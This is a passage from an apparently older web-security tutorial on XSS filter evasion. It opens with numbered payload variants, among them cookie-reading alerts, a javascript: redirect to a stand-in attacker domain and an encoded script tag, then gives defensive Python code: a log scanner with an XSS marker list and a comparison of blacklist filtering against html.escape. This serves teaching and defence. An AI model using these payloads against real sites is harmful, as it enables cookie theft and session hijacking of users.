  15. <script language="JavaScript">alert(document.cookie)</script>
  16. <a href="javascript:document.location='http://www.eviltarget.com/'">XSS</a>
  17. ??script??alert(??XSS??)??/script??
  18. %A7%A2%BE%BC%F3%E3%F2%E9%F0%F4%BE%E1%EC%E5%F2%F4%A8430638%A9%BC%AF%F3%E3%F2%E9%F0%F4%BE

The basic rule is to avoid the characters that are used in SQL injection and XSS attacks, like single quotes, the dash character, the dot character and of course the script tag, etc.
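The same list of variations is useful on the defending side. The block below is an added example, not code from the original article: it normalises the query string of web server access log lines the way the list above suggests (repeated URL decoding, stripping /* */ comments and whitespace, case folding) and flags requests that still carry an XSS marker. The log lines are constructed for this example, and the marker list and the normalise helper are this example's own assumptions, not part of any product.

```python
"""Added example: triage reflected-XSS probes in web server access logs.

Input is assumed to be Combined Log Format lines (the samples below are
constructed, not data from the article).  The normalisation undoes the
script-tag tricks listed above so that a plain substring test works.
"""
import re
from urllib.parse import unquote

# Markers that, after normalisation, indicate an XSS probe.  Keep the list
# short and review hits by hand; this is a triage aid, not a WAF.
MARKERS = ("<script", "javascript:", "fromcharcode", "onkeypress=", "onclick=")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalise(fragment):
    """Decode and strip a URL fragment so the variations above collapse to one form."""
    s = fragment
    # Repeated URL decoding handles %3C and double-encoded %253C alike.
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*.*?\*/", "", s)   # strip JavaScript block comments, e.g. <script/**/>
    s = re.sub(r"\s+", "", s)         # drop whitespace, e.g. <script >
    return s.lower()                  # fold JaVaScRiPt to javascript


def suspicious(path):
    """Return the markers found in the normalised request path (empty list if clean)."""
    norm = normalise(path)
    return [m for m in MARKERS if m in norm]


def scan_log(lines):
    """Return (ip, original path, markers) for every request that carries a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                  # skip lines that are not in the expected format
        found = suspicious(m.group("path"))
        if found:
            hits.append((m.group("ip"), m.group("path"), found))
    return hits


# Constructed sample log: one benign request and three probes taken from the
# variations above (addresses are documentation ranges, not real hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2008:12:00:01 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Jun/2008:12:00:02 +0000] "GET /search?q=%3Cscript%20%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 640',
    '203.0.113.9 - - [10/Jun/2008:12:00:03 +0000] "GET /search?q=%3Cscript/**/%3E/**/alert(String.fromCharCode(88,83,83))%3C/script%3E HTTP/1.1" 200 640',
    '198.51.100.7 - - [10/Jun/2008:12:00:04 +0000] "GET /profile?name=%3Ca%20href%3D%22javascript:document.location%3D%27http://example.invalid/%27%22%3Ex%3C/a%3E HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, path, markers in scan_log(SAMPLE_LOG):
        print(f"{ip} {markers} {path}")
```

Running the block prints the three probing requests with the markers that fired; the plain search for "shoes" is not reported. The point of the normalisation step is that a detector which looks for the literal string "<script>" misses variations 4 and 6 to 9 above, while one that decodes, strips comments and whitespace and lowercases first sees them all as the same thing.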

Handling encoding filters

So after we do some XSS filter probing we can start experimenting. The above method works better in DOM based attacks or in attacks where you don't need to include the script tag at all. Someone can very easily see that by using Python. Try for example to escape the characters by doing something like this:

cgi.escape("XSS_payload")

And see what is returned. All the encodings above (excluding raw HTML) remain unaffected (if we exclude, of course, the script tag).
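To show what escaping actually buys the defender, here is an added example (not the article's code) that runs a handful of the variations listed above through two constructed filters: a naive blacklist that deletes the literal "<script>" tag, and proper HTML body encoding. cgi.escape(), used above, was removed in Python 3.8; html.escape() is its replacement and, with quote=True (the default), also encodes the quote characters that a blacklist tends to leave alone. The still_executable check is an approximation written for this example.

```python
"""Added example: blacklist filtering versus output encoding.

The variants come from the script-tag list earlier in the article; the two
filters and the survival check are constructed for this example.
"""
import html
import re

# A few of the variations listed above; the host in the last one is a
# placeholder, not the article's example domain.
VARIANTS = [
    '<script>alert(document.cookie)</script>',
    '<script >alert(document.cookie)</script >',
    '<script/**/>/**/alert(String.fromCharCode(88,83,83))/**/</script/**/>',
    '<script language="JaVaScRiPt">alert(document.cookie)</script>',
    '<a href="javascript:document.location=\'http://example.invalid/\'">XSS</a>',
]


def blacklist_filter(value):
    """A naive filter: delete only the literal lowercase tag and its closer."""
    return value.replace("<script>", "").replace("</script>", "")


def encode_for_html_body(value):
    """Treat the value as data for an HTML body context: markup characters become entities."""
    return html.escape(value, quote=True)


def still_executable(value):
    """Approximate check: would an HTML parser still see a tag or a live javascript: URL?"""
    # A tag opener the parser would honour, tolerating the whitespace trick.
    tag = re.search(r"<\s*/?\s*[a-z]", value, re.I)
    # A javascript: URL that still sits inside a raw attribute quote.
    url = re.search(r"""["']\s*javascript:""", value, re.I)
    return bool(tag or url)


def compare(variants=VARIANTS):
    """Return (variants surviving the blacklist, variants surviving encoding)."""
    survived_blacklist = sum(still_executable(blacklist_filter(v)) for v in variants)
    survived_encoding = sum(still_executable(encode_for_html_body(v)) for v in variants)
    return survived_blacklist, survived_encoding


if __name__ == "__main__":
    blacklist, encoded = compare()
    print(f"blacklist lets {blacklist} of {len(VARIANTS)} variants through")
    print(f"html.escape lets {encoded} of {len(VARIANTS)} variants through")
```

The blacklist stops only the first, canonical form; the whitespace, comment, mixed-case and href variants all pass it unchanged. Encoding does not try to recognise the attack at all, it just turns every "<", ">", "&" and quote into an entity, so nothing the browser would parse as markup survives. The caveat is that html.escape() is correct only for data placed in an HTML body or quoted attribute; a value placed inside a script block, a URL or a CSS property needs the encoder for that context instead.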

Injecting the code

To be continued…

Reference [1]: http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html

Reference [2]: http://www.ietf.org/rfc/rfc2109.txt

Reference [3]: http://www.w3schools.com/JS/default.asp

Reference [4]: http://www.w3schools.com/html/html_forms.asp

Reference [5]: http://www.javascriptobfuscator.com

Reference [6]: http://portswigger.net/suite/

Reference [7]: http://en.wikipedia.org/wiki/Words_per_minute

Reference [8]: Karat, C.M., Halverson, C., Horn, D. and Karat, J. (1999), Patterns of entry and correction in large vocabulary continuous speech recognition systems, CHI 99 Conference Proceedings, 568–575.

Reference [9]: Brown, C. M. (1988). Human-computer interface design guidelines. Norwood, NJ: Ablex Publishing.

Reference [10]: http://johanlouwers.blogspot.com/2006_12_17_archive.html

Reference [11]: http://elated.com/articles/javascript-timers-with-settimeout-and-setinterval/

Reference [12]: http://www.advancescripts.com/detailed/12532.html

Reference [13]: http://javascriptcompressor.com/

Reference [13]: http://iframe.in/